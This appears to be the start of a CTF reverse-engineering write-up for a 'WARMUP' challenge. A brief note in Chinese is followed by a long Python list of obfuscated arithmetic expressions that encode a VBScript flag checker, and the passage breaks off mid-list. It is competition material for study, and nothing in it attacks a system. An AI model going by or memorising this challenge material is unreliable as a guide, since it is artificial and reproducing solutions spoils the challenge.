Reverse#
WARMUP#
vbs脚本,先写个脚本去混淆
src = [int( 667205/8665 ) , int( -7671+7786 ) , int( 8541-8438 ) , int( 422928/6408 ) , int( -1948+2059 ) , int( -3066+3186 ) , int( 756-724 ) , int( 4080/120 ) , int( -3615+3683 ) , int( -1619+1720 ) , int( -2679+2776 ) , int( 659718/5787 ) , int( 302752/9461 ) , int( -6627+6694 ) , int( -4261+4345 ) , int( 81690/1167 ) , int( 636180/9220 ) , int( 538658/6569 ) , int( -1542+1588 ) , int( -1644+1676 ) , int( 122184/1697 ) , int( 966411/9963 ) , int( 2186-2068 ) , int( -5283+5384 ) , int( 305056/9533 ) , int( 66402/651 ) , int( 1141452/9756 ) , int( 882090/8019 ) , int( -4243+4275 ) , int( 2669-2564 ) , int( 83+27 ) , int( 254880/7965 ) , int( -1291+1379 ) , int( -4699+4788 ) , int( 4730-4663 ) , int( -1179+1263 ) , int( 5274-5204 ) , int( 210144/6567 ) , int( -6803+6853 ) , int( 6655-6607 ) , int( 4067-4017 ) , int( 121900/2300 ) , int( -6158+6191 ) , int( 11934/351 ) , int( 64883/4991 ) , int( 65420/6542 ) , int( 3781-3679 ) , int( 1612-1504 ) , int( 892788/9204 ) , int( 927618/9006 ) , int( -6692+6724 ) , int( 410591/6731 ) , int( 6675-6643 ) , int( 697880/9560 ) , int( 4250-4140 ) , int( 5464-5352 ) , int( -1082+1199 ) , int( 3343-3227 ) , int( 1211-1145 ) , int( 482406/4346 ) , int( -5549+5669 ) , int( -5150+5190 ) , int( 4400-4366 ) , int( -3277+3346 ) , int( -6649+6759 ) , int( -5669+5785 ) , int( -6734+6835 ) , int( 9757-9643 ) , int( 109-77 ) , int( 5620-5504 ) , int( -2887+2991 ) , int( -3081+3182 ) , int( -5109+5141 ) , int( 699860/9998 ) , int( -3603+3679 ) , int( 1631-1566 ) , int( 445-374 ) , int( 294118/5071 ) , int( -1115+1149 ) , int( 222376/5054 ) , int( 8137-8105 ) , int( -1653+1687 ) , int( 357104/4058 ) , int( 1650-1561 ) , int( -9501+9568 ) , int( 1047-963 ) , int( 2540-2470 ) , int( 1692-1658 ) , int( 9947-9906 ) , int( 9186-9173 ) , int( -2846+2856 ) , int( 425187/3573 ) , int( -3066+3167 ) , int( 2850-2748 ) , int( -2992+3090 ) , int( 958230/8190 ) , int( 869295/7305 ) , int( 3380-3275 ) , int( -7338+7455 ) , int( 408848/4048 ) , int( 9211-9179 ) , int( -2437+2498 ) , int( 1672-1640 ) , int( 2378-2344 ) , int( 544749/9557 ) , int( 351120/7315 ) , int( 773800/7738 ) , int( 2033-1931 ) , int( -8059+8111 ) , int( -4731+4783 ) , int( -9204+9252 ) , int( -4261+4316 ) , int( 850521/8421 ) , int( -7011+7112 ) , int( 292272/6089 ) , int( -8609+8666 ) , int( -2921+2972 ) , int( 6772-6672 ) , int( 487611/9561 ) , int( -6754+6802 ) , int( 464835/8155 ) , int( -939+987 ) , int( 421173/7389 ) , int( -8145+8201 ) , int( 9368-9268 ) , int( -7682+7738 ) , int( -8646+8699 ) , int( 484612/4996 ) , int( 286832/5516 ) , int( -9710+9760 ) , int( 884156/9022 ) , int( 7080-6979 ) , int( 265477/5009 ) , int( 6+49 ) , int( 5395-5298 ) , int( 6645-6595 ) , int( -9706+9763 ) , int( -6697+6752 ) , int( 927-870 ) , int( 4048-3946 ) , int( 34398/702 ) , int( 825675/8175 ) , int( -438+491 ) , int( 87808/1792 ) , int( -2601+2653 ) , int( 420228/7782 ) , int( -5266+5317 ) , int( 53059/547 ) , int( 477054/9354 ) , int( 9238-9189 ) , int( 799112/7912 ) , int( 3340-3284 ) , int( 8544-8444 ) , int( 1220-1171 ) , int( -7192+7245 ) , int( 73629/729 ) , int( 6523-6473 ) , int( 2761-2659 ) , int( 358124/3692 ) , int( -6167+6266 ) , int( -3842+3894 ) , int( 7840-7739 ) , int( -3980+4036 ) , int( 987-935 ) , int( 6868/68 ) , int( -559+656 ) , int( 6513-6465 ) , int( 843300/8433 ) , int( -8159+8261 ) , int( -753+807 ) , int( 278700/5574 ) , int( 5600/112 ) , int( -549+646 ) , int( -7697+7750 ) , int( 390292/7364 ) , int( 988020/9980 ) , int( -3250+3302 ) , int( 6295-6195 ) , int( 4342-4242 ) , int( -9602+9704 ) , int( 1312-1214 ) , int( 1065-1012 ) , int( 1122/22 ) , int( 191012/3604 ) , int( 330775/3275 ) , int( 226848/2224 ) , int( 4973-4922 ) , int( 369357/3657 ) , int( -7229+7282 ) , int( 588/12 ) , int( 57570/570 ) , int( 4554-4498 ) , int( 483924/4938 ) , int( 485600/9712 ) , int( 5051-4998 ) , int( 8467-8417 ) , int( -6799+6855 ) , int( 668360/6820 ) , int( 428008/7643 ) , int( -309+359 ) , int( -7495+7549 ) , int( 198200/1982 ) , int( -4298+4351 ) , int( 2979-2928 ) , int( -391+443 ) , int( -5951+6006 ) , int( -2271+2372 ) , int( 1431-1382 ) , int( -2812+2866 ) , int( 4906-4853 ) , int( -5308+5365 ) , int( -8587+8636 ) , int( -1003+1053 ) , int( 468741/4641 ) , int( 8449-8392 ) , int( 14877/261 ) , int( -5097+5146 ) , int( 6695-6646 ) , int( -2866+2922 ) , int( 483786/9486 ) , int( -4142+4193 ) , int( 2347-2296 ) , int( -1784+1833 ) , int( 116229/2193 ) , int( -1099+1148 ) , int( 8230-8180 ) , int( -4351+4406 ) , int( 1975-1924 ) , int( 779229/7871 ) , int( 102960/1040 ) , int( 67830/1330 ) , int( -4771+4873 ) , int( -32+129 ) , int( 155456/2776 ) , int( 9798-9700 ) , int( 4944-4894 ) , int( -2496+2594 ) , int( 5495-5444 ) , int( 8113-8015 ) , int( -8444+8496 ) , int( 3896-3847 ) , int( 6306-6255 ) , int( 1284-1185 ) , int( 1003986/9843 ) , int( -1321+1371 ) , int( 2676-2578 ) , int( -5421+5521 ) , int( 564186/5757 ) , int( 6608-6559 ) , int( 7038-6937 ) , int( 209720/3745 ) , int( -616+715 ) , int( 9766-9709 ) , int( 2111-2012 ) , int( 528993/9981 ) , int( 1901-1851 ) , int( 281344/5024 ) , int( 5695-5641 ) , int( 4815-4762 ) , int( 399556/3956 ) , int( 572730/5615 ) , int( -5718+5817 ) , int( 21+27 ) , int( 4532-4475 ) , int( -8446+8499 ) , int( 5786-5689 ) , int( 4177-4121 ) , int( -8411+8511 ) , int( -9499+9599 ) , int( 479528/8563 ) , int( 6850-6793 ) , int( -3725+3823 ) , int( -8692+8743 ) , int( 284298/2901 ) , int( 214302/4202 ) , int( 576675/5825 ) , int( -4565+4667 ) , int( -7223+7321 ) , int( 383278/3911 ) , int( -2540+2590 ) , int( 35+13 ) , int( -5549+5597 ) , int( 969122/9889 ) , int( 964712/9844 ) , int( -6231+6328 ) , int( -1560+1660 ) , int( -7416+7514 ) , int( 609144/5972 ) , int( 471432/9066 ) , int( -4500+4597 ) , int( 8620-8566 ) , int( 7113-7014 ) , int( -2488+2588 ) , int( -3599+3651 ) , int( 211956/6234 ) , int( 1697-1665 ) , int( -5122+5161 ) , int( -3189+3221 ) , int( -5840+114 ) , int( -37790+6278 ) , int( -8.231351E+07/3957 ) , int( -14110+7864 ) , int( -30457-1205 ) , int( 9930-9863 ) , int( 107-55 ) , int( 517-7291 ) , int( -31263+6916 ) , int( -29685+9083 ) , int( -2.138515E+07/3442 ) , int( -26304-1370 ) , int( -1.510879E+08/6060 ) , int( -903-3261 ) , int( -22484-8007 ) , int( -34437+5126 ) , int( -10635+3856 ) , int( -1.97004E+08/9374 ) , int( -1.079768E+08/6550 ) , int( -2.533546E+07/3739 ) , int( -25645+6931 ) , int( -1.720817E+08/7056 ) , int( -12498+5774 ) , int( -2.164872E+08/7546 ) , int( -8955-8316 ) , int( -3584+3597 ) , int( -1280+1290 ) , int( 795633/7041 ) , int( 291669/2451 ) , int( 9044-8942 ) , int( 264014/2614 ) , int( -7841+7873 ) , int( 10919/179 ) , int( 22272/696 ) , int( -8135+8169 ) , int( -5733+5847 ) , int( 371547/3753 ) , int( 473980/9115 ) , int( 391-284 ) , int( -1824+1925 ) , int( -1707+1828 ) , int( 2151-2117 ) , int( 2535/195 ) , int( 7236-7226 ) , int( 58097/4469 ) , int( 2710/271 ) , int( 118677/3043 ) , int( -7992+8024 ) , int( -5.682766E+07/8145 ) , int( -3.747722E+07/1805 ) , int( -20535-2876 ) , int( -5076000/750 ) , int( -28220-733 ) , int( -33583+7603 ) , int( 7730-7648 ) , int( 7057-6990 ) , int( 338728/6514 ) , int( -4.203267E+07/6205 ) , int( -20128-4219 ) , int( -29090+8488 ) , int( -7954+1177 ) , int( -25730+8808 ) , int( -23859-3357 ) , int( -2130+2143 ) , int( 6827-6817 ) , int( 4334-4264 ) , int( 4851-4734 ) , int( 5121-5011 ) , int( 7034-6935 ) , int( 4197-4081 ) , int( -1823+1928 ) , int( 1032744/9304 ) , int( 1547-1437 ) , int( -7393+7425 ) , int( 608932/7426 ) , int( 864513/7389 ) , int( 1748-1638 ) , int( 501676/6118 ) , int( 510473/7619 ) , int( -6752+6792 ) , int( -5142+5257 ) , int( -9558+9635 ) , int( 7906-7805 ) , int( 5308-5193 ) , int( 163300/1420 ) , int( 10961/113 ) , int( 740364/7188 ) , int( -5327+5428 ) , int( 5703-5659 ) , int( -7307+7339 ) , int( 445970/3878 ) , int( 608-492 ) , int( -4799+4913 ) , int( -3687+3762 ) , int( 9993-9892 ) , int( 1032493/8533 ) , int( 103607/2527 ) , int( 123266/9482 ) , int( 61520/6152 ) , int( 251424/7857 ) , int( 104032/3251 ) , int( -7228+7260 ) , int( 239648/7489 ) , int( -1858+1926 ) , int( 865515/8243 ) , int( 818481/7509 ) , int( 244384/7637 ) , int( -4252+4359 ) , int( 10+66 ) , int( -3202+3303 ) , int( 466070/4237 ) , int( 3973-3929 ) , int( -7658+7690 ) , int( 563430/5366 ) , int( 168872/3838 ) , int( 306144/9567 ) , int( 158046/1491 ) , int( 311740/7085 ) , int( -6862+6894 ) , int( 621760/5360 ) , int( -8151+8252 ) , int( 9608-9499 ) , int( 309680/2765 ) , int( 244288/5552 ) , int( 6191-6159 ) , int( 705936/6303 ) , int( 4828-4717 ) , int( 1097330/9542 ) , int( 431596/9809 ) , int( -8819+8851 ) , int( 546675/4925 ) , int( 805545/6885 ) , int( -5087+5203 ) , int( 1223-1151 ) , int( 9566-9465 ) , int( 2413-2293 ) , int( 4760-4747 ) , int( -4859+4869 ) , int( 3357-3325 ) , int( 667-635 ) , int( -2223+2255 ) , int( 4357-4325 ) , int( 366928/5396 ) , int( 203175/1935 ) , int( -7837+7946 ) , int( 47936/1498 ) , int( 3589-3474 ) , int( 254920/6373 ) , int( 3498-3448 ) , int( 54113/1021 ) , int( 9319-9266 ) , int( 380767/9287 ) , int( 298804/6791 ) , int( -5151+5183 ) , int( 3487-3380 ) , int( 246760/6169 ) , int( 7465-7415 ) , int( -8879+8932 ) , int( -281+334 ) , int( 314470/7670 ) , int( -1151+1164 ) , int( 4880-4870 ) , int( 3582-3550 ) , int( 147008/4594 ) , int( 169248/5289 ) , int( -8224+8256 ) , int( 4654/358 ) , int( -2894+2904 ) , int( 3479-3447 ) , int( 2036-2004 ) , int( 7024-6992 ) , int( -8686+8718 ) , int( -664+703 ) , int( 53952/1686 ) , int( -10371+3595 ) , int( -21805-3310 ) , int( -1.930486E+08/8525 ) , int( -6242-530 ) , int( -2.479211E+08/9214 ) , int( -28712+8110 ) , int( 4047-9789 ) , int( 278397/4419 ) , int( -6794+6804 ) , int( 310624/9707 ) , int( 120896/3778 ) , int( 6925-6893 ) , int( 8256-8224 ) , int( -4736+4843 ) , int( 1256-1180 ) , int( 4250-4149 ) , int( -9132+9242 ) , int( 173344/5417 ) , int( -9030+9091 ) , int( 72-40 ) , int( 344204/4529 ) , int( 351985/3485 ) , int( 6120-6010 ) , int( 1113-1073 ) , int( 2781-2666 ) , int( 6375-6259 ) , int( 780330/6845 ) , int( 106050/1414 ) , int( 1239-1138 ) , int( -986+1107 ) , int( 324351/7911 ) , int( -7872+7885 ) , int( -1326+1336 ) , int( 17728/554 ) , int( 61600/1925 ) , int( -4930+4962 ) , int( 113856/3558 ) , int( -7210+7280 ) , int( 3126-3015 ) , int( 9894-9780 ) , int( 2040-2008 ) , int( 957810/9122 ) , int( -1680+1712 ) , int( -7068+7129 ) , int( -9765+9797 ) , int( 4121-4073 ) , int( -9924+9956 ) , int( -4370+4454 ) , int( 437340/3940 ) , int( 5315-5283 ) , int( 304500/6090 ) , int( -6807+6860 ) , int( 19186/362 ) , int( -6044+6057 ) , int( 9876-9866 ) , int( -2071+2103 ) , int( 8923-8891 ) , int( 4890-4858 ) , int( 7473-7441 ) , int( 5632-5600 ) , int( 8294-8262 ) , int( -271+303 ) , int( 6410-6378 ) , int( 5536-5421 ) , int( 44720/1118 ) , int( 6272-6167 ) , int( 26568/648 ) , int( 233440/7295 ) , int( -8944+9005 ) , int( 204192/6381 ) , int( 5731-5626 ) , int( 9617-9604 ) , int( 7388-7378 ) , int( 960/30 ) , int( 99008/3094 ) , int( 8422-8390 ) , int( 19136/598 ) , int( -6328+6360 ) , int( 199712/6241 ) , int( -2315+2347 ) , int( -6898+6930 ) , int( 9875-9768 ) , int( -4621+4661 ) , int( -7725+7830 ) , int( -3507+3548 ) , int( 4844-4812 ) , int( 570716/9356 ) , int( -3814+3846 ) , int( -1467+1532 ) , int( 138115/1201 ) , int( -7634+7733 ) , int( -7021+7061 ) , int( 942-865 ) , int( 924630/8806 ) , int( 8706-8606 ) , int( -6756+6796 ) , int( -5325+5440 ) , int( 2765-2649 ) , int( -7079+7193 ) , int( 2100/28 ) , int( 8156-8055 ) , int( -7792+7913 ) , int( 5324/121 ) , int( 6423-6391 ) , int( 5454-5414 ) , int( -4828+4933 ) , int( 13504/422 ) , int( 244552/3176 ) , int( -3016+3127 ) , int( -4103+4203 ) , int( 2567-2535 ) , int( 435-328 ) , int( 787-711 ) , int( 1474-1373 ) , int( 803550/7305 ) , int( -5410+5451 ) , int( -6556+6588 ) , int( -2204+2247 ) , int( 223424/6982 ) , int( -8753+8802 ) , int( 135872/3088 ) , int( -7757+7789 ) , int( 272-223 ) , int( 340177/8297 ) , int( 1487-1446 ) , int( -9083+9115 ) , int( 7132-7093 ) , int( 4540-4508 ) , int( -13541+6804 ) , int( -7.75285E+07/2501 ) , int( -32055+4060 ) , int( -1318-5661 ) , int( -5.265648E+07/3209 ) , int( -31857+4377 ) , int( 585065/9001 ) , int( -2558+2641 ) , int( -8549+8616 ) , int( 6403-6330 ) , int( 6271-6198 ) , int( -2.477346E+07/3988 ) , int( -17020-9885 ) , int( -2542488/104 ) , int( -1327+1340 ) , int( -887+897 ) , int( -7751+7783 ) , int( 2629-2597 ) , int( -6489+6521 ) , int( 2254-2222 ) , int( 154518/1981 ) , int( -764+865 ) , int( 629040/5242 ) , int( 1098636/9471 ) , int( 78793/6061 ) , int( -7110+7120 ) , int( -7378+7410 ) , int( -1777+1809 ) , int( 2538-2506 ) , int( 119392/3731 ) , int( -4327+4340 ) , int( 10580/1058 ) , int( -7677+7709 ) , int( 8254-8222 ) , int( 3782-3750 ) , int( 214240/6695 ) , int( 7006-6967 ) , int( 8305-8273 ) , int( 4841-4766 ) , int( 937-854 ) , int( 616460/9484 ) , int( -16-6721 ) , int( -28078-2921 ) , int( -24670-3325 ) , int( -9340+3372 ) , int( -25211-6560 ) , int( -22908+5154 ) , int( 6567-6554 ) , int( -635+645 ) , int( -5907+5939 ) , int( 4841-4809 ) , int( 20576/643 ) , int( -2196+2228 ) , int( 3270-3164 ) , int( 212384/6637 ) , int( 509533/8353 ) , int( 94368/2949 ) , int( -1648+1696 ) , int( 23335/1795 ) , int( -86+96 ) , int( 209408/6544 ) , int( 5186-5154 ) , int( 91072/2846 ) , int( 8978-8946 ) , int( 45850/655 ) , int( 256632/2312 ) , int( -8647+8761 ) , int( 5661-5629 ) , int( 191940/1828 ) , int( 2132-2100 ) , int( -9855+9916 ) , int( 3562-3530 ) , int( 24864/518 ) , int( 275424/8607 ) , int( 3176-3092 ) , int( 3798-3687 ) , int( -6055+6087 ) , int( -6024+6074 ) , int( -6425+6478 ) , int( -9745+9798 ) , int( 23387/1799 ) , int( -3891+3901 ) , int( -4637+4669 ) , int( -3183+3215 ) , int( 9860-9828 ) , int( 1677-1645 ) , int( 3698-3666 ) , int( -7915+7947 ) , int( 200128/6254 ) , int( -3984+4016 ) , int( 5982-5876 ) , int( -5627+5659 ) , int( 6122-6061 ) , int( -5851+5883 ) , int( 204520/5113 ) , int( -566+672 ) , int( 260512/8141 ) , int( 7314-7271 ) , int( -1563+1595 ) , int( 5079-4964 ) , int( 11680/292 ) , int( 8464-8359 ) , int( 6991-6950 ) , int( -3136+3168 ) , int( 4262-4219 ) , int( 4518-4486 ) , int( 9317-9210 ) , int( 7615-7575 ) , int( 55650/530 ) , int( 1185-1144 ) , int( 7853-7812 ) , int( -3099+3131 ) , int( 288288/3744 ) , int( -8871+8982 ) , int( -8502+8602 ) , int( 2470-2438 ) , int( 364100/7282 ) , int( -8754+8807 ) , int( 476874/8831 ) , int( 768-755 ) , int( 8485-8475 ) , int( -6548+6580 ) , int( 68960/2155 ) , int( 31904/997 ) , int( 113792/3556 ) , int( -8387+8419 ) , int( 116448/3639 ) , int( 279552/8736 ) , int( -2637+2669 ) , int( -5483+5599 ) , int( 4853-4752 ) , int( -7090+7199 ) , int( 544320/4860 ) , int( 305600/9550 ) , int( 510570/8370 ) , int( 72640/2270 ) , int( 3200-3085 ) , int( -6820+6860 ) , int( 396375/3775 ) , int( -7447+7488 ) , int( -9189+9202 ) , int( -4261+4271 ) , int( 1688-1656 ) , int( 9083-9051 ) , int( 9012-8980 ) , int( -3650+3682 ) , int( 291424/9107 ) , int( 842-810 ) , int( -7058+7090 ) , int( -7119+7151 ) , int( -4515+4630 ) , int( 9315-9275 ) , int( 2216-2111 ) , int( -1847+1888 ) , int( 100192/3131 ) , int( 8671-8610 ) , int( -1498+1530 ) , int( 5376-5261 ) , int( 965-925 ) , int( 597628/5638 ) , int( -6697+6738 ) , int( 9809-9796 ) , int( 740-730 ) , int( 4866-4834 ) , int( 8064-8032 ) , int( 8204-8172 ) , int( 6706-6674 ) , int( -3302+3334 ) , int( -9585+9617 ) , int( 8259-8227 ) , int( 9319-9287 ) , int( 6042-5927 ) , int( -4563+4603 ) , int( 843124/7954 ) , int( -468+509 ) , int( 91-59 ) , int( 55+6 ) , int( -470+502 ) , int( 8800-8684 ) , int( -732+833 ) , int( 1859-1750 ) , int( -9065+9177 ) , int( -3551+3564 ) , int( -5998+6008 ) , int( 309248/9664 ) , int( 78080/2440 ) , int( 1337-1305 ) , int( 1031-999 ) , int( -2405+2483 ) , int( 900011/8911 ) , int( 9591-9471 ) , int( 3993-3877 ) , int( 37024/2848 ) , int( 2372-2362 ) , int( -1999+2031 ) , int( 402-370 ) , int( 2339-2307 ) , int( 215232/6726 ) , int( 56706/4362 ) , int( 88610/8861 ) , int( 6347-6315 ) , int( -1057+1089 ) , int( -8215+8247 ) , int( -5359+5391 ) , int( 360048/9232 ) , int( 150208/4694 ) , int( 549760/6872 ) , int( 709710/8655 ) , int( -9253+9324 ) , int( -1875+1940 ) , int( 3060-9834 ) , int( -1.219054E+08/5007 ) , int( -16837-3765 ) , int( -13859+7384 ) , int( -40413+8132 ) , int( -7.735399E+07/3455 ) , int( -3620+3633 ) , int( 7370/737 ) , int( 9207-9175 ) , int( 21216/663 ) , int( -8881+8913 ) , int( 59712/1866 ) , int( 1881-1776 ) , int( 5987-5955 ) , int( 213378/3498 ) , int( 185536/5798 ) , int( -1106+1154 ) , int( -6274+6306 ) , int( 244-186 ) , int( -7680+7712 ) , int( 417216/3936 ) , int( 1383-1351 ) , int( 346419/5679 ) , int( -7913+7945 ) , int( 3201-3153 ) , int( 268160/8380 ) , int( -5532+5590 ) , int( -6959+6991 ) , int( 3356-3245 ) , int( -7222+7339 ) , int( 9549-9433 ) , int( -426+498 ) , int( 510555/5055 ) , int( 699720/5831 ) , int( -5601+5633 ) , int( 260653/4273 ) , int( 26752/836 ) , int( 4148-4114 ) , int( -6483+6517 ) , int( 120601/9277 ) , int( 92430/9243 ) , int( 3296/103 ) , int( 3355-3323 ) , int( 6661-6629 ) , int( -309+341 ) , int( -4300+4370 ) , int( 132090/1190 ) , int( 296742/2603 ) , int( -568+600 ) , int( 576016/5143 ) , int( 4279-4168 ) , int( -3514+3629 ) , int( -7862+7894 ) , int( 201544/3304 ) , int( 6720/210 ) , int( -1246+1295 ) , int( 6539-6507 ) , int( 7479-7395 ) , int( 685536/6176 ) , int( -7312+7344 ) , int( -2052+2128 ) , int( -8510+8611 ) , int( 311630/2833 ) , int( 8715-8675 ) , int( -6734+6849 ) , int( -5728+5805 ) , int( 9955-9854 ) , int( 269445/2343 ) , int( -4059+4174 ) , int( 47142/486 ) , int( 921-818 ) , int( 663-562 ) , int( 164328/4008 ) , int( 23634/1818 ) , int( 82110/8211 ) , int( 5730-5698 ) , int( 245312/7666 ) , int( 1656-1624 ) , int( 269536/8423 ) , int( 168864/5277 ) , int( -2835+2867 ) , int( -9348+9380 ) , int( 216128/6754 ) , int( -6873+6978 ) , int( 8769-8737 ) , int( -7159+7220 ) , int( -2374+2406 ) , int( 145560/3639 ) , int( 84945/809 ) , int( 4967-4935 ) , int( 3533-3490 ) , int( -8222+8254 ) , int( -5971+6020 ) , int( 203811/4971 ) , int( 64768/2024 ) , int( -8894+8971 ) , int( -7605+7716 ) , int( 7530-7430 ) , int( 8961-8929 ) , int( 204800/4096 ) , int( 34291/647 ) , int( 5124-5070 ) , int( 117455/9035 ) , int( 70910/7091 ) , int( 191072/5971 ) , int( -8276+8308 ) , int( 194464/6077 ) , int( 1606-1574 ) , int( 200032/6251 ) , int( -183+215 ) , int( 7729-7697 ) , int( -6288+6320 ) , int( 563-457 ) , int( 48544/1517 ) , int( 504-443 ) , int( -227+259 ) , int( 358600/8965 ) , int( 5705-5599 ) , int( -4736+4768 ) , int( 321554/7478 ) , int( -8525+8557 ) , int( 402615/3501 ) , int( 1320/33 ) , int( 233100/2220 ) , int( 7463-7422 ) , int( 8959-8918 ) , int( 9538-9506 ) , int( -3809+3886 ) , int( 17094/154 ) , int( 3305-3205 ) , int( 5389-5357 ) , int( 101450/2029 ) , int( -2702+2755 ) , int( 422-368 ) , int( 3681-3668 ) , int( 1374-1364 ) , int( 244192/7631 ) , int( 2106-2074 ) , int( 301504/9422 ) , int( 6788-6756 ) , int( 275072/8596 ) , int( -2612+2644 ) , int( 1544-1512 ) , int( 263424/8232 ) , int( 5985-5869 ) , int( 409555/4055 ) , int( 7844-7735 ) , int( 668752/5971 ) , int( 1110-1078 ) , int( -880+941 ) , int( 9828-9796 ) , int( 610650/5310 ) , int( -2213+2253 ) , int( 5697-5592 ) , int( 340505/8305 ) , int( 1757-1744 ) , int( 88340/8834 ) , int( 2986-2954 ) , int( -7747+7779 ) , int( 5952-5920 ) , int( 6697-6665 ) , int( 180160/5630 ) , int( 1671-1639 ) , int( -8613+8645 ) , int( 95904/2997 ) , int( 8994-8879 ) , int( 7256-7216 ) , int( -5776+5881 ) , int( 1529-1488 ) , int( 179680/5615 ) , int( -684+745 ) , int( 119840/3745 ) , int( 828000/7200 ) , int( -1371+1411 ) , int( 2474-2368 ) , int( 144033/3513 ) , int( 1617-1604 ) , int( 9503-9493 ) , int( -1100+1132 ) , int( 211680/6615 ) , int( 7607-7575 ) , int( 5777-5745 ) , int( 319712/9991 ) , int( -9605+9637 ) , int( 140672/4396 ) , int( 3740-3708 ) , int( 92575/805 ) , int( 9363-9323 ) , int( 292136/2756 ) , int( -9536+9577 ) , int( -9310+9342 ) , int( 7634-7573 ) , int( -9716+9748 ) , int( -7090+7206 ) , int( 376-275 ) , int( -6333+6442 ) , int( 3986-3874 ) , int( 3115-3102 ) , int( -2171+2181 ) , int( 100544/3142 ) , int( 74-42 ) , int( -1400+1432 ) , int( 81504/2547 ) , int( 5073-5041 ) , int( 4596-4564 ) , int( 9048-9016 ) , int( -2733+2765 ) , int( -4650+4663 ) , int( -151+161 ) , int( 10592/331 ) , int( 3163-3131 ) , int( 4722-4690 ) , int( 30624/957 ) , int( 2545-2513 ) , int( 251232/7851 ) , int( -2926+2958 ) , int( 239584/7487 ) , int( 389-350 ) , int( -2+34 ) , int( -5.053404E+07/7460 ) , int( -26034+1687 ) , int( -19313-1289 ) , int( -30-6697 ) , int( -17366-1346 ) , int( -15077-1903 ) , int( -6552-432 ) , int( -13927-3764 ) , int( -37232+7921 ) , int( 1107-7886 ) , int( -15477-5539 ) , int( -1.750707E+07/1062 ) , int( -3.826407E+07/5647 ) , int( 364959/5793 ) , int( 2034-2024 ) , int( -7296+7328 ) , int( -3111+3143 ) , int( -3156+3188 ) , int( 7990-7958 ) , int( 166496/5203 ) , int( -4151+4183 ) , int( 4071-4039 ) , int( 9102-9070 ) , int( -6166+6234 ) , int( 283185/2697 ) , int( 3833-3724 ) , int( 119776/3743 ) , int( 658224/5877 ) , int( 7881-7773 ) , int( 390328/4024 ) , int( 8122-8017 ) , int( 934010/8491 ) , int( 579751/8653 ) , int( -8024+8128 ) , int( 57036/588 ) , int( 2457-2343 ) , int( 9781-9737 ) , int( -5599+5631 ) , int( -7710+7809 ) , int( -4501+4606 ) , int( 625072/5581 ) , int( 783432/7533 ) , int( 877488/8688 ) , int( 6473-6359 ) , int( 5963-5897 ) , int( 150282/1242 ) , int( -9775+9891 ) , int( -7486+7587 ) , int( 565-552 ) , int( 5581-5571 ) , int( 771-739 ) , int( 69824/2182 ) , int( 4603-4571 ) , int( -5709+5741 ) , int( 8242-8210 ) , int( 94112/2941 ) , int( 100352/3136 ) , int( -8344+8376 ) , int( -1824+1936 ) , int( 6678-6570 ) , int( 638454/6582 ) , int( 6614-6509 ) , int( 1012990/9209 ) , int( 8744-8677 ) , int( 561912/5403 ) , int( 444163/4579 ) , int( 10089-9975 ) , int( 280960/8780 ) , int( 320128/5248 ) , int( -3399+3431 ) , int( -1771+1836 ) , int( 5417-5302 ) , int( -1824+1923 ) , int( 212600/5315 ) , int( -4973+5050 ) , int( 60060/572 ) , int( 639000/6390 ) , int( 355520/8888 ) , int( 866410/7534 ) , int( 5901-5824 ) , int( 9869-9768 ) , int( -4100+4215 ) , int( 9973-9858 ) , int( 601594/6202 ) , int( 857887/8329 ) , int( -7663+7764 ) , int( -205+249 ) , int( -5719+5751 ) , int( 8618-8506 ) , int( 822732/7412 ) , int( 9707-9592 ) , int( 106832/2428 ) , int( 1917-1885 ) , int( 7491-7442 ) , int( 263507/6427 ) , int( -3050+3091 ) , int( 6688/209 ) , int( 3579-3540 ) , int( 62400/1950 ) , int( -5.533603E+07/8508 ) , int( -1.094461E+07/378 ) , int( -19198-7803 ) , int( -1503-5013 ) , int( -22047-8352 ) , int( -9364+9447 ) , int( -3664+3731 ) , int( 7198-7125 ) , int( 6274-6201 ) , int( -16376+9628 ) , int( -3.882402E+07/1232 ) , int( -35990+7452 ) , int( 59020/4540 ) , int( 32900/3290 ) , int( 51776/1618 ) , int( -7782+7814 ) , int( 9795-9763 ) , int( 254592/7956 ) , int( 83520/2610 ) , int( 7721-7689 ) , int( -7133+7165 ) , int( 1340-1308 ) , int( 330066/3334 ) , int( -9106+9211 ) , int( 6064-5952 ) , int( 6286-6182 ) , int( -9220+9321 ) , int( -2056+2170 ) , int( 279444/4234 ) , int( 5693-5572 ) , int( 7627-7511 ) , int( 9114-9013 ) , int( 128864/4027 ) , int( 465247/7627 ) , int( -1215+1247 ) , int( 9956-9841 ) , int( -6215+6255 ) , int( 26080/652 ) , int( -5167+5282 ) , int( 296520/7413 ) , int( -5640+5745 ) , int( -8069+8110 ) , int( -740+772 ) , int( 92235/2145 ) , int( 6267-6235 ) , int( -3504+3619 ) , int( 11240/281 ) , int( 753448/7108 ) , int( -5324+5365 ) , int( -5911+5952 ) , int( -2746+2778 ) , int( -2953+3030 ) , int( 1074702/9682 ) , int( -3942+4042 ) , int( 8672-8640 ) , int( 3343-3293 ) , int( -9590+9643 ) , int( -1920+1974 ) , int( 190568/4648 ) , int( -8907+8939 ) , int( 4693-4605 ) , int( 4103-3992 ) , int( 1024974/8991 ) , int( 117216/3663 ) , int( -7725+7837 ) , int( 1025460/9495 ) , int( 6361-6264 ) , int( 925995/8819 ) , int( 166210/1511 ) , int( 8106-8039 ) , int( 256672/2468 ) , int( 8511-8414 ) , int( -1592+1706 ) , int( 4349-4336 ) , int( 20-10 ) , int( 131648/4114 ) , int( 3440-3408 ) , int( 3286-3254 ) , int( 86528/2704 ) , int( -209+241 ) , int( 176256/5508 ) , int( -4786+4818 ) , int( 24576/768 ) , int( 973581/8771 ) , int( -5686+5803 ) , int( 1068012/9207 ) , int( 419760/5830 ) , int( 438138/4338 ) , int( 6119-5999 ) , int( 56320/1760 ) , int( -5861+5922 ) , int( -9201+9233 ) , int( 6816-6705 ) , int( 8085-7968 ) , int( -365+481 ) , int( 604944/8402 ) , int( 246238/2438 ) , int( -8362+8482 ) , int( 171296/5353 ) , int( -4409+4447 ) , int( 6653-6621 ) , int( 336856/4108 ) , int( -7684+7789 ) , int( 2731-2628 ) , int( 6687-6583 ) , int( 93496/806 ) , int( 1485-1445 ) , int( 5893-5859 ) , int( 410832/8559 ) , int( -4662+4696 ) , int( 44352/1386 ) , int( -9673+9711 ) , int( 86144/2692 ) , int( 507744/7052 ) , int( 9182-9081 ) , int( 7532-7412 ) , int( 8068-8028 ) , int( 921096/9304 ) , int( 7511-7406 ) , int( 542752/4846 ) , int( 7625-7521 ) , int( 811939/8039 ) , int( -5529+5643 ) , int( 366498/5553 ) , int( 366993/3033 ) , int( 116/1 